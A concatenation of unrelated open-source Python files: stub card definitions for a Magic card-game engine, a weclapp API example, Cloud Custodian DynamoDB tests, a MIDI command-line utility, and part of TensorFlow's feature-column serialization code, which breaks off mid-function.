def crumbling_colossus():
return AbilityNotImplemented
def crumbling_colossus():
return AbilityNotImplemented
return crumbling_colossus, crumbling_colossus,
@card("Crown of Empires")
def crown_of_empires(card, abilities):
def crown_of_empires():
return AbilityNotImplemented
return crown_of_empires,
@card("Aegis Angel")
def aegis_angel(card, abilities):
def aegis_angel():
return AbilityNotImplemented
def aegis_angel():
return AbilityNotImplemented
return aegis_angel, aegis_angel,
@card("Titanic Growth")
def titanic_growth(card, abilities):
def titanic_growth():
return AbilityNotImplemented
return titanic_growth,
@card("Throne of Empires")
def throne_of_empires(card, abilities):
def throne_of_empires():
return AbilityNotImplemented
return throne_of_empires,
@card("Tectonic Rift")
def tectonic_rift(card, abilities):
def tectonic_rift():
return AbilityNotImplemented
return tectonic_rift,
@card("Timely Reinforcements")
def timely_reinforcements(card, abilities):
def timely_reinforcements():
return AbilityNotImplemented
return timely_reinforcements,
@card("Arachnus Web")
def arachnus_web(card, abilities):
def arachnus_web():
return AbilityNotImplemented
def arachnus_web():
return AbilityNotImplemented
def arachnus_web():
return AbilityNotImplemented
return arachnus_web, arachnus_web, arachnus_web,
@card("Adaptive Automaton")
def adaptive_automaton(card, abilities):
def adaptive_automaton():
return AbilityNotImplemented
def adaptive_automaton():
return AbilityNotImplemented
def adaptive_automaton():
return AbilityNotImplemented
return adaptive_automaton, adaptive_automaton, adaptive_automaton,
@card("Guardians' Pledge")
def guardians_pledge(card, abilities):
def guardians_pledge():
return AbilityNotImplemented
return guardians_pledge,
@card("Chandra's Phoenix")
def chandras_phoenix(card, abilities):
def chandras_phoenix():
return AbilityNotImplemented
def chandras_phoenix():
return AbilityNotImplemented
def chandras_phoenix():
return AbilityNotImplemented
return chandras_phoenix, chandras_phoenix, chandras_phoenix,
@card("Dungrove Elder")
def dungrove_elder(card, abilities):
def dungrove_elder():
return AbilityNotImplemented
def dungrove_elder():
return AbilityNotImplemented
return dungrove_elder, dungrove_elder,
@card("Aven Fleetwing")
def aven_fleetwing(card, abilities):
def aven_fleetwing():
return AbilityNotImplemented
def aven_fleetwing():
return AbilityNotImplemented
return aven_fleetwing, aven_fleetwing,
@card("Hunter's Insight")
def hunters_insight(card, abilities):
def hunters_insight():
return AbilityNotImplemented
return hunters_insight,
@card("Sorin's Vengeance")
def sorins_vengeance(card, abilities):
def sorins_vengeance():
return AbilityNotImplemented
return sorins_vengeance,
@card("Gladecover Scout")
def gladecover_scout(card, abilities):
def gladecover_scout():
return AbilityNotImplemented
return gladecover_scout,
@card("Bloodlord of Vaasgoth")
def bloodlord_of_vaasgoth(card, abilities):
def bloodlord_of_vaasgoth():
return AbilityNotImplemented
def bloodlord_of_vaasgoth():
return AbilityNotImplemented
def bloodlord_of_vaasgoth():
return AbilityNotImplemented
return bloodlord_of_vaasgoth, bloodlord_of_vaasgoth, bloodlord_of_vaasgoth,
@card("Turn to Frog")
def turn_to_frog(card, abilities):
def turn_to_frog():
return AbilityNotImplemented
return turn_to_frog,
@card("Personal Sanctuary")
def personal_sanctuary(card, abilities):
def personal_sanctuary():
return AbilityNotImplemented
return personal_sanctuary,
@card("Benalish Veteran")
def benalish_veteran(card, abilities):
def benalish_veteran():
return AbilityNotImplemented
return benalish_veteran,
@card("Blood Ogre")
def blood_ogre(card, abilities):
def blood_ogre():
return AbilityNotImplemented
def blood_ogre():
return AbilityNotImplemented
return blood_ogre, blood_ogre,
@card("Frost Breath")
def frost_breath(card, abilities):
def frost_breath():
return AbilityNotImplemented
return frost_breath,
@card("Taste of Blood")
def taste_of_blood(card, abilities):
def taste_of_blood():
return AbilityNotImplemented
return taste_of_blood,
@card("Angelic Destiny")
def angelic_destiny(card, abilities):
def angelic_destiny():
return AbilityNotImplemented
def angelic_destiny():
return AbilityNotImplemented
def angelic_destiny():
return AbilityNotImplemented
return angelic_destiny, angelic_destiny, angelic_destiny,
@card("Druidic Satchel")
def druidic_satchel(card, abilities):
def druidic_satchel():
return AbilityNotImplemented
return druidic_satchel,
@card("Azure Mage")
def azure_mage(card, abilities):
def azure_mage():
return AbilityNotImplemented
return azure_mage,
@card("Arachnus Spinner")
def arachnus_spinner(card, abilities):
def arachnus_spinner():
return AbilityNotImplemented
def arachnus_spinner():
return AbilityNotImplemented
return arachnus_spinner, arachnus_spinner,
@card("Gorehorn Minotaurs")
def gorehorn_minotaurs(card, abilities):
def gorehorn_minotaurs():
return AbilityNotImplemented
return gorehorn_minotaurs,
@card("Bloodrage Vampire")
def bloodrage_vampire(card, abilities):
def bloodrage_vampire():
return AbilityNotImplemented
return bloodrage_vampire,
@card("Devouring Swarm")
def devouring_swarm(card, abilities):
def devouring_swarm():
return AbilityNotImplemented
def devouring_swarm():
return AbilityNotImplemented
return devouring_swarm, devouring_swarm,
@card("Gideon's Avenger")
def gideons_avenger(card, abilities):
def gideons_avenger():
return AbilityNotImplemented
return gideons_avenger,
@card("Crimson Mage")
def crimson_mage(card, abilities):
def crimson_mage():
return AbilityNotImplemented
return crimson_mage,
@card("Garruk's Horde")
def garruks_horde(card, abilities):
def garruks_horde():
return AbilityNotImplemented
def garruks_horde():
return AbilityNotImplemented
def garruks_horde():
return AbilityNotImplemented
return garruks_horde, garruks_horde, garruks_horde,
@card("Duskhunter Bat")
def duskhunter_bat(card, abilities):
def duskhunter_bat():
return AbilityNotImplemented
def duskhunter_bat():
return AbilityNotImplemented
return duskhunter_bat, duskhunter_bat,
@card("Visions of Beyond")
def visions_of_beyond(card, abilities):
def visions_of_beyond():
return AbilityNotImplemented
return visions_of_beyond,
@card("Garruk, Primal Hunter")
def garruk_primal_hunter(card, abilities):
def garruk_primal_hunter():
return AbilityNotImplemented
def garruk_primal_hunter():
return AbilityNotImplemented
def garruk_primal_hunter():
return AbilityNotImplemented
return garruk_primal_hunter, garruk_primal_hunter, garruk_primal_hunter,
@card("Gideon's Lawkeeper")
def gideons_lawkeeper(card, abilities):
def gideons_lawkeeper():
return AbilityNotImplemented
return gideons_lawkeeper,
@card("Stonehorn Dignitary")
def stonehorn_dignitary(card, abilities):
def stonehorn_dignitary():
return AbilityNotImplemented
return stonehorn_dignitary,
@card("Vengeful Pharaoh")
def vengeful_pharaoh(card, abilities):
def vengeful_pharaoh():
return AbilityNotImplemented
def vengeful_pharaoh():
return AbilityNotImplemented
return vengeful_pharaoh, vengeful_pharaoh,
@card("Doubling Chant")
def doubling_chant(card, abilities):
def doubling_chant():
return AbilityNotImplemented
return doubling_chant,
@card("Skinshifter")
def skinshifter(card, abilities):
def skinshifter():
return AbilityNotImplemented
return skinshifter,
@card("Wall of Torches")
def wall_of_torches(card, abilities):
def wall_of_torches():
return AbilityNotImplemented
return wall_of_torches,
@card("Scepter of Empires")
def scepter_of_empires(card, abilities):
def scepter_of_empires():
return AbilityNotImplemented
return scepter_of_empires,
@card("Wring Flesh")
def wring_flesh(card, abilities):
def wring_flesh():
return AbilityNotImplemented
return wring_flesh,
@card("Skywinder Drake")
def skywinder_drake(card, abilities):
def skywinder_drake():
return AbilityNotImplemented
def skywinder_drake():
return AbilityNotImplemented
return skywinder_drake, skywinder_drake,
@card("Divine Favor")
def divine_favor(card, abilities):
def divine_favor():
return AbilityNotImplemented
def divine_favor():
return AbilityNotImplemented
def divine_favor():
return AbilityNotImplemented
return divine_favor, divine_favor, divine_favor,
@card("Lurking Crocodile")
def lurking_crocodile(card, abilities):
def lurking_crocodile():
return AbilityNotImplemented
def lurking_crocodile():
return AbilityNotImplemented
return lurking_crocodile, lurking_crocodile,
@card("Stormblood Berserker")
def stormblood_berserker(card, abilities):
def stormblood_berserker():
return AbilityNotImplemented
def stormblood_berserker():
return AbilityNotImplemented
return stormblood_berserker, stormblood_berserker,
@card("Goblin Bangchuckers")
def goblin_bangchuckers(card, abilities):
def goblin_bangchuckers():
return AbilityNotImplemented
return goblin_bangchuckers,
@card("Scrambleverse")
def scrambleverse(card, abilities):
def scrambleverse():
return AbilityNotImplemented
return scrambleverse,
@card("Alabaster Mage")
def alabaster_mage(card, abilities):
def alabaster_mage():
return AbilityNotImplemented
return alabaster_mage,
@card("Primordial Hydra")
def primordial_hydra(card, abilities):
def primordial_hydra():
return AbilityNotImplemented
def primordial_hydra():
return AbilityNotImplemented
def primordial_hydra():
return AbilityNotImplemented
return primordial_hydra, primordial_hydra, primordial_hydra,
@card("Mind Unbound")
def mind_unbound(card, abilities):
def mind_unbound():
return AbilityNotImplemented
return mind_unbound,
@card("Onyx Mage")
def onyx_mage(card, abilities):
def onyx_mage():
return AbilityNotImplemented
return onyx_mage,
@card("Rusted Sentinel")
def rusted_sentinel(card, abilities):
def rusted_sentinel():
return AbilityNotImplemented
return rusted_sentinel,
@card("Merfolk Mesmerist")
def merfolk_mesmerist(card, abilities):
def merfolk_mesmerist():
return AbilityNotImplemented
return merfolk_mesmerist,
@card("Jace, Memory Adept")
def jace_memory_adept(card, abilities):
def jace_memory_adept():
return AbilityNotImplemented
def jace_memory_adept():
return AbilityNotImplemented
def jace_memory_adept():
return AbilityNotImplemented
return jace_memory_adept, jace_memory_adept, jace_memory_adept,
@card("Chandra, the Firebrand")
def chandra_the_firebrand(card, abilities):
def chandra_the_firebrand():
return AbilityNotImplemented
def chandra_the_firebrand():
return AbilityNotImplemented
def chandra_the_firebrand():
return AbilityNotImplemented
return chandra_the_firebrand, chandra_the_firebrand, chandra_the_firebrand,
@card("Circle of Flame")
def circle_of_flame(card, abilities):
def circle_of_flame():
return AbilityNotImplemented
return circle_of_flame,
@card("Monomania")
def monomania(card, abilities):
def monomania():
return AbilityNotImplemented
return monomania,
@card("Sphinx of Uthuun")
def sphinx_of_uthuun(card, abilities):
def sphinx_of_uthuun():
return AbilityNotImplemented
def sphinx_of_uthuun():
return AbilityNotImplemented
return sphinx_of_uthuun, sphinx_of_uthuun,
@card("Grand Abolisher")
def grand_abolisher(card, abilities):
def grand_abolisher():
return AbilityNotImplemented
return grand_abolisher,
@card("Carnage Wurm")
def carnage_wurm(card, abilities):
def carnage_wurm():
return AbilityNotImplemented
def carnage_wurm():
return AbilityNotImplemented
return carnage_wurm, carnage_wurm,
@card("Lord of the Unreal")
def lord_of_the_unreal(card, abilities):
def lord_of_the_unreal():
return AbilityNotImplemented
return lord_of_the_unreal,
@card("Swiftfoot Boots")
def swiftfoot_boots(card, abilities):
def swiftfoot_boots():
return AbilityNotImplemented
def swiftfoot_boots():
return AbilityNotImplemented
return swiftfoot_boots, swiftfoot_boots,
@card("Warstorm Surge")
def warstorm_surge(card, abilities):
def warstorm_surge():
return AbilityNotImplemented
return warstorm_surge,
@card("Pride Guardian")
def pride_guardian(card, abilities):
def pride_guardian():
return AbilityNotImplemented
def pride_guardian():
return AbilityNotImplemented
return pride_guardian, pride_guardian,
@card("Phantasmal Bear")
def phantasmal_bear(card, abilities):
def phantasmal_bear():
return AbilityNotImplemented
return phantasmal_bear,
@card("Master Thief")
def master_thief(card, abilities):
def master_thief():
return AbilityNotImplemented
return master_thief,
@card("Spirit Mantle")
def spirit_mantle(card, abilities):
def spirit_mantle():
return AbilityNotImplemented
def spirit_mantle():
return AbilityNotImplemented
return spirit_mantle, spirit_mantle,
@card("Rune-Scarred Demon")
def runescarred_demon(card, abilities):
def runescarred_demon():
return AbilityNotImplemented
def runescarred_demon():
return AbilityNotImplemented
return runescarred_demon, runescarred_demon,
@card("Vampire Outcasts")
def vampire_outcasts(card, abilities):
def vampire_outcasts():
return AbilityNotImplemented
def vampire_outcasts():
return AbilityNotImplemented
return vampire_outcasts, vampire_outcasts,
@card("Greatsword")
def greatsword(card, abilities):
def greatsword():
return AbilityNotImplemented
def greatsword():
return AbilityNotImplemented
return greatsword, greatsword,
@card("Sundial of the Infinite")
def sundial_of_the_infinite(card, abilities):
def sundial_of_the_infinite():
return AbilityNotImplemented
return sundial_of_the_infinite,
@card("Manalith")
def manalith(card, abilities):
def manalith():
return AbilityNotImplemented
return manalith,
@card("Sorin's Thirst")
def sorins_thirst(card, abilities):
def sorins_thirst():
return AbilityNotImplemented
return sorins_thirst,
@card("Kite Shield")
def kite_shield(card, abilities):
def kite_shield():
return AbilityNotImplemented
def kite_shield():
return AbilityNotImplemented
return kite_shield, kite_shield,
@card("Hideous Visage")
def hideous_visage(card, abilities):
def hideous_visage():
return AbilityNotImplemented
return hideous_visage,
@card("Dark Favor")
def dark_favor(card, abilities):
def dark_favor():
return AbilityNotImplemented
def dark_favor():
return AbilityNotImplemented
def dark_favor():
return AbilityNotImplemented
return dark_favor, dark_favor, dark_favor,
@card("Griffin Rider")
def griffin_rider(card, abilities):
def griffin_rider():
return AbilityNotImplemented
return griffin_rider,
@card("Tormented Soul")
def tormented_soul(card, abilities):
def tormented_soul():
return AbilityNotImplemented
return tormented_soul,
@card("Phantasmal Image")
def phantasmal_image(card, abilities):
def phantasmal_image():
return AbilityNotImplemented
return phantasmal_image,
@card("Buried Ruin")
def buried_ruin(card, abilities):
def buried_ruin():
return AbilityNotImplemented
def buried_ruin():
return AbilityNotImplemented
return buried_ruin, buried_ruin,
@card("Furyborn Hellkite")
def furyborn_hellkite(card, abilities):
def furyborn_hellkite():
return AbilityNotImplemented
def furyborn_hellkite():
return AbilityNotImplemented
return furyborn_hellkite, furyborn_hellkite,
@card("Jade Mage")
def jade_mage(card, abilities):
def jade_mage():
return AbilityNotImplemented
return jade_mage,
@card("Goblin Fireslinger")
def goblin_fireslinger(card, abilities):
def goblin_fireslinger():
return AbilityNotImplemented
return goblin_fireslinger,
@card("Peregrine Griffin")
def peregrine_griffin(card, abilities):
def peregrine_griffin():
return AbilityNotImplemented
def peregrine_griffin():
return AbilityNotImplemented
return peregrine_griffin, peregrine_griffin,
@card("Jace's Archivist")
def jaces_archivist(card, abilities):
def jaces_archivist():
return AbilityNotImplemented
return jaces_archivist,
@card("Drifting Shade")
def drifting_shade(card, abilities):
def drifting_shade():
return AbilityNotImplemented
def drifting_shade():
return AbilityNotImplemented
return drifting_shade, drifting_shade, | {
"content_hash": "b2a5b1df2e281171889c0d5995ef51c9",
"timestamp": "",
"source": "github",
"line_count": 1019,
"max_line_length": 79,
"avg_line_length": 19.18547595682041,
"alnum_prop": 0.7011253196930947,
"repo_name": "Julian/cardboard",
"id": "09fe47da008fdd447a2409f96748571c540526d1",
"size": "19550",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cardboard/cards/sets/magic_2012.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2656758"
},
{
"name": "Shell",
"bytes": "4517"
}
],
"symlink_target": ""
} |
from weclapp4py import Weclapp
tenant = None
api_key = None
print("Weclapp API Example script")
print("**************************\n")
if tenant is None or api_key is None:
print("You can set tenant and api key inside example.py to avoid the following questions.\n")
tenant = input("Enter company/tenant name: ")
api_key = input("Enter api_key: ")
weclapp = Weclapp(tenant, api_key)
print("\nCounting...")
print("contacts %s" % weclapp.contact.count())
print("customers %s" % weclapp.customer.count())
print("\nGet everything....")
customers = weclapp.customer.read()
print(customers)
contacts = weclapp.contact.read()
for contact in contacts:
print("%s: %s %s" % (contact["id"], contact["firstName"], contact["lastName"]))
print("\nCreate, Update and Delete")
contact = weclapp.contact.create("Bar", "Foo", email="[email protected]")
contact = weclapp.contact.read(res_id=contact["id"])
print("%s: %s %s" % (contact["id"], contact["firstName"], contact["lastName"]))
contact = weclapp.contact.update(contact["id"], "BarBar", "FooFoo", email="[email protected]")
contact = weclapp.contact.read(res_id=contact["id"])
print("%s: %s %s" % (contact["id"], contact["firstName"], contact["lastName"]))
weclapp.contact.delete(contact["id"])
try:
max_new = weclapp.contact.read(res_id=contact["id"])
except Exception:
print("Contact not found")
| {
"content_hash": "5f2116bb521301887ebeb7e7ae9fbd63",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 97,
"avg_line_length": 33.26829268292683,
"alnum_prop": 0.6752199413489736,
"repo_name": "useblocks/weclapp4py",
"id": "ea749b020c66adc65191cda8a96f27be79bc0e11",
"size": "1772",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8331"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function, unicode_literals
from .common import BaseTest
from c7n.resources.dynamodb import DeleteTable
from c7n.executor import MainThreadExecutor
class DynamodbTest(BaseTest):
def test_resources(self):
session_factory = self.replay_flight_data('test_dynamodb_table')
p = self.load_policy(
{'name': 'tables',
'resource': 'dynamodb-table'},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]['TableName'], 'rolltop')
self.assertEqual(resources[0]['TableStatus'], 'ACTIVE')
def test_invoke_action(self):
session_factory = self.replay_flight_data(
'test_dynamodb_invoke_action')
p = self.load_policy(
{'name': 'tables',
'resource': 'dynamodb-table',
'actions': [
{'type': 'invoke-lambda',
'function': 'process_resources'}
]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
def test_delete_tables(self):
session_factory = self.replay_flight_data('test_dynamodb_delete_table')
self.patch(DeleteTable, 'executor_factory', MainThreadExecutor)
p = self.load_policy({
'name': 'delete-empty-tables',
'resource': 'dynamodb-table',
'filters': [{
'TableSizeBytes': 0}],
'actions': [{
'type': 'delete'}]}, session_factory=session_factory)
resources = p.run()
self.assertEqual(resources[0]['TableName'], 'c7n.DynamoDB.01')
def test_tag_filter(self):
session_factory = self.replay_flight_data('test_dynamodb_tag_filter')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-tag-filters',
'resource': 'dynamodb-table',
'filters': [{
'tag:test_key': 'test_value'}]},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
arn = resources[0]['TableArn']
tags = client.list_tags_of_resource(ResourceArn=arn)
tag_map = {t['Key']: t['Value'] for t in tags['Tags']}
self.assertTrue('test_key' in tag_map)
def test_dynamodb_mark(self):
session_factory = self.replay_flight_data(
'test_dynamodb_mark')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-mark',
'resource': 'dynamodb-table',
'filters': [
{'TableName': 'rolltop'}],
'actions': [
{'type': 'mark-for-op', 'days': 4,
'op': 'delete', 'tag': 'test_tag'}]},
session_factory=session_factory)
resources = p.run()
arn = resources[0]['TableArn']
self.assertEqual(len(resources), 1)
tags = client.list_tags_of_resource(ResourceArn=arn)
tag_map = {t['Key']: t['Value'] for t in tags['Tags']}
self.assertTrue('test_key' in tag_map)
def test_dynamodb_tag(self):
session_factory = self.replay_flight_data('test_dynamodb_tag')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-tag-table',
'resource': 'dynamodb-table',
'filters': [{'TableName': 'rolltop'}],
'actions': [{
'type': 'tag',
'tags': {'new_tag_key': 'new_tag_value'}
}]
},
session_factory=session_factory)
resources = p.run()
arn = resources[0]['TableArn']
tags = client.list_tags_of_resource(ResourceArn=arn)
tag_map = {t['Key']: t['Value'] for t in tags['Tags']}
self.assertEqual({
'test_key': 'test_value',
'new_tag_key': 'new_tag_value'
},
tag_map)
def test_dynamodb_unmark(self):
session_factory = self.replay_flight_data(
'test_dynamodb_unmark')
client = session_factory().client('dynamodb')
p = self.load_policy({
'name': 'dynamodb-unmark',
'resource': 'dynamodb-table',
'filters': [
{'TableName': 'rolltop'}],
'actions': [
{'type': 'remove-tag',
'tags': ['test_key']}]},
session_factory=session_factory)
resources = p.run()
arn = resources[0]['TableArn']
self.assertEqual(len(resources), 1)
tags = client.list_tags_of_resource(ResourceArn=arn)
self.assertFalse('test_key' in tags)
| {
"content_hash": "63cf9a990e2d454559f3eadfb23d1ebe",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 82,
"avg_line_length": 39.04838709677419,
"alnum_prop": 0.540272614622057,
"repo_name": "jimmyraywv/cloud-custodian",
"id": "91d121591413f49f004027e2a202105c998553a5",
"size": "5432",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/test_dynamodb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1364"
},
{
"name": "Python",
"bytes": "1760566"
}
],
"symlink_target": ""
} |
import argparse
import os
import signal
import sys
import time
import rtmidi
def signal_handler(signal, frame):
"""Handler for Ctrl-C"""
sys.exit(0)
def midi_in_callback(value, args):
"""Function called when MIDI data is received"""
data = value[0]
if args.hex:
print('[' + ', '.join('0x%02X' % x for x in data) + ']')
else:
print(data)
def get_port(client, device_id):
"""Return open port for a device"""
try:
# Try to parse device id as number first
dev_id = int(device_id)
if not dev_id < len(client.get_ports()):
raise Exception('Device id out of range')
except ValueError:
# If this fails, try to find a port name starting with it
for i, name in enumerate(client.get_ports()):
if name.lower().startswith(device_id.lower()):
return client.open_port(i)
# If this also fails, try to find a port name that contains
# a substring of it
for i, name in enumerate(client.get_ports()):
if device_id.lower() in name.lower():
return client.open_port(i)
raise Exception('Device "%s" not found' % device_id)
return client.open_port(dev_id)
def main():
if len(sys.argv) < 2:
# Show help when no arguments are given
sys.argv.append('-h')
# Setup command line parser
parser = argparse.ArgumentParser(description='MIDI utility')
parser.add_argument('-l', '--list', action='store_true',
help='List connected devices')
parser.add_argument('-d', '--device', metavar='ID',
help='Selected device')
parser.add_argument('-w', '--write', type=str, nargs='+', metavar='DATA',
help='Write data')
parser.add_argument('-r', '--read', action='store_true',
help='Read data')
parser.add_argument('-x', '--hex', action='store_true',
help='Show/interprete data as hex')
parser.add_argument('-s', '--sysex-file', metavar='FILE',
help='Sysex file to transmit')
args = parser.parse_args()
try:
if args.list:
# List command, show all connected devices
print()
print('Available ports:')
print()
print('\tInput:')
print('\t', 'ID', 'Name', sep='\t')
for i, name in enumerate(rtmidi.MidiIn().get_ports()):
print('\t', i, name, sep='\t')
print()
print('\tOutput:')
print('\t', 'ID', 'Name', sep='\t')
for i, name in enumerate(rtmidi.MidiOut().get_ports()):
print('\t', i, name, sep='\t')
print()
elif args.write:
# Write command, send data
if not args.device:
raise Exception('No device specified.')
outport = get_port(rtmidi.MidiOut(), args.device)
if args.hex:
data = [int(x, 16) for x in args.write]
else:
data = [int(x, 0) for x in args.write]
outport.send_message(data)
del outport
elif args.read:
# Read command, receive data until Ctrl-C is pressed
signal.signal(signal.SIGINT, signal_handler)
if not args.device:
raise Exception('No device specified.')
inport = get_port(rtmidi.MidiIn(), args.device)
inport.set_callback(midi_in_callback, args)
inport.ignore_types(False, False, False)
while True:
time.sleep(1)
elif args.sysex_file:
# Send sysex file command
if not args.device:
raise Exception('No device specified.')
outport = get_port(rtmidi.MidiOut(), args.device)
file_path = args.sysex_file
if not (os.path.exists(file_path) and os.path.isfile(file_path)):
raise Exception('File "%s" does not exist.' % file_path)
with open(file_path, "rb") as f:
data = f.read()
data_pos = 0
while True:
sysex_start_pos = data.find(b"\xF0", data_pos)
sysex_end_pos = data.find(b"\xF7", data_pos)
if sysex_start_pos >= 0 and sysex_end_pos >= 0:
message = data[sysex_start_pos:sysex_end_pos + 1]
print("Sending sysex message with %i bytes." %
len(message))
outport.send_message(message)
time.sleep(0.05)
data_pos = sysex_end_pos + 1
else:
break
except Exception as e:
print('Error:', e)
if __name__ == '__main__':
main()
| {
"content_hash": "6eb717889e6415e45afefa8822b78dfe",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 77,
"avg_line_length": 35.86029411764706,
"alnum_prop": 0.515070740209145,
"repo_name": "sourcebox/midiutil",
"id": "e44d0b542a843fff2c4eb85e7c518bb3a3c2f94a",
"size": "4901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "midiutil.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "3026"
}
],
"symlink_target": ""
} |
"""FeatureColumn serialization, deserialization logic."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.feature_column import feature_column_v2 as fc_lib
from tensorflow.python.feature_column import sequence_feature_column as sfc_lib
from tensorflow.python.ops import init_ops
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
_FEATURE_COLUMNS = [
fc_lib.BucketizedColumn, fc_lib.CrossedColumn, fc_lib.EmbeddingColumn,
fc_lib.HashedCategoricalColumn, fc_lib.IdentityCategoricalColumn,
fc_lib.IndicatorColumn, fc_lib.NumericColumn,
fc_lib.SequenceCategoricalColumn, fc_lib.SequenceDenseColumn,
fc_lib.SharedEmbeddingColumn, fc_lib.VocabularyFileCategoricalColumn,
fc_lib.VocabularyListCategoricalColumn, fc_lib.WeightedCategoricalColumn,
init_ops.TruncatedNormal, sfc_lib.SequenceNumericColumn
]
@tf_export('__internal__.feature_column.serialize_feature_column', v1=[])
def serialize_feature_column(fc):
"""Serializes a FeatureColumn or a raw string key.
This method should only be used to serialize parent FeatureColumns when
implementing FeatureColumn.get_config(), else serialize_feature_columns()
is preferable.
This serialization also keeps information of the FeatureColumn class, so
deserialization is possible without knowing the class type. For example:
a = numeric_column('x')
a.get_config() gives:
{
'key': 'price',
'shape': (1,),
'default_value': None,
'dtype': 'float32',
'normalizer_fn': None
}
While serialize_feature_column(a) gives:
{
'class_name': 'NumericColumn',
'config': {
'key': 'price',
'shape': (1,),
'default_value': None,
'dtype': 'float32',
'normalizer_fn': None
}
}
Args:
fc: A FeatureColumn or raw feature key string.
Returns:
Keras serialization for FeatureColumns, leaves string keys unaffected.
Raises:
ValueError if called with input that is not string or FeatureColumn.
"""
if isinstance(fc, six.string_types):
return fc
elif isinstance(fc, fc_lib.FeatureColumn):
return {'class_name': fc.__class__.__name__, 'config': fc.get_config()}
else:
raise ValueError('Instance: {} is not a FeatureColumn'.format(fc))
@tf_export('__internal__.feature_column.deserialize_feature_column', v1=[])
def deserialize_feature_column(config,
custom_objects=None,
columns_by_name=None):
"""Deserializes a `config` generated with `serialize_feature_column`.
This method should only be used to deserialize parent FeatureColumns when
implementing FeatureColumn.from_config(), else deserialize_feature_columns()
is preferable. Returns a FeatureColumn for this config.
Args:
config: A Dict with the serialization of feature columns acquired by
`serialize_feature_column`, or a string representing a raw column.
custom_objects: A Dict from custom_object name to the associated keras
serializable objects (FeatureColumns, classes or functions).
columns_by_name: A Dict[String, FeatureColumn] of existing columns in order
to avoid duplication.
Raises:
ValueError if `config` has invalid format (e.g: expected keys missing,
or refers to unknown classes).
Returns:
A FeatureColumn corresponding to the input `config`.
"""
# TODO(b/118939620): Simplify code if Keras utils support object deduping.
if isinstance(config, six.string_types):
return config
# A dict from class_name to class for all FeatureColumns in this module.
# FeatureColumns not part of the module can be passed as custom_objects.
module_feature_column_classes = {
cls.__name__: cls for cls in _FEATURE_COLUMNS}
if columns_by_name is None:
columns_by_name = {}
(cls,
cls_config) = _class_and_config_for_serialized_keras_object(
config,
module_objects=module_feature_column_classes,
custom_objects=custom_objects,
printable_module_name='feature_column_v2')
if not issubclass(cls, fc_lib.FeatureColumn):
raise ValueError(
'Expected FeatureColumn class, instead found: {}'.format(cls))
# Always deserialize the FeatureColumn, in order to get the name.
new_instance = cls.from_config( # pylint: disable=protected-access
cls_config,
custom_objects=custom_objects,
columns_by_name=columns_by_name)
# If the name already exists, re-use the column from columns_by_name,
# (new_instance remains unused).
return columns_by_name.setdefault(
_column_name_with_class_name(new_instance), new_instance)
def serialize_feature_columns(feature_columns):
"""Serializes a list of FeatureColumns.
Returns a list of Keras-style config dicts that represent the input
FeatureColumns and can be used with `deserialize_feature_columns` for
reconstructing the original columns.
Args:
feature_columns: A list of FeatureColumns.
Returns:
Keras serialization for the list of FeatureColumns.
Raises:
ValueError if called with input that is not a list of FeatureColumns.
"""
return [serialize_feature_column(fc) for fc in feature_columns]
def deserialize_feature_columns(configs, custom_objects=None):
"""Deserializes a list of FeatureColumns configs.
Returns a list of FeatureColumns given a list of config dicts acquired by
`serialize_feature_columns`.
Args:
configs: A list of Dicts with the serialization of feature columns acquired
by `serialize_feature_columns`.
custom_objects: A Dict from custom_object name to the associated keras
serializable objects (FeatureColumns, classes or functions).
Returns:
FeatureColumn objects corresponding to the input configs.
Raises:
ValueError if called with input that is not a list of FeatureColumns.
"""
columns_by_name = {}
return [
deserialize_feature_column(c, custom_objects, columns_by_name)
for c in configs
]
def _column_name_with_class_name(fc):
"""Returns a unique name for the feature column used during deduping.
Without this two FeatureColumns that have the same name and where
one wraps the other, such as an IndicatorColumn wrapping a
SequenceCategoricalColumn, will fail to deserialize because they will have the
same name in columns_by_name, causing the wrong column to be returned.
Args:
fc: A FeatureColumn.
Returns:
A unique name as a string.
"""
return fc.__class__.__name__ + ':' + fc.name
def _serialize_keras_object(instance):
"""Serialize a Keras object into a JSON-compatible representation."""
_, instance = tf_decorator.unwrap(instance)
if instance is None:
return None
if hasattr(instance, 'get_config'):
name = instance.__class__.__name__
config = instance.get_config()
serialization_config = {}
for key, item in config.items():
if isinstance(item, six.string_types):
serialization_config[key] = item
continue
# Any object of a different type needs to be converted to string or dict
# for serialization (e.g. custom functions, custom classes)
try:
serialized_item = _serialize_keras_object(item)
if isinstance(serialized_item, dict) and not isinstance(item, dict):
serialized_item['__passive_serialization__'] = True
serialization_config[key] = serialized_item
except ValueError:
serialization_config[key] = item
return {'class_name': name, 'config': serialization_config}
if hasattr(instance, '__name__'):
return instance.__name__
raise ValueError('Cannot serialize', instance)
def _deserialize_keras_object(identifier,
module_objects=None,
custom_objects=None,
printable_module_name='object'):
"""Turns the serialized form of a Keras object back into an actual object."""
if identifier is None:
return None
if isinstance(identifier, dict):
# In this case we are dealing with a Keras config dictionary.
config = identifier
(cls, cls_config) = _class_and_config_for_serialized_keras_object(
config, module_objects, custom_objects, printable_module_name)
if hasattr(cls, 'from_config'):
arg_spec = tf_inspect.getfullargspec(cls.from_config)
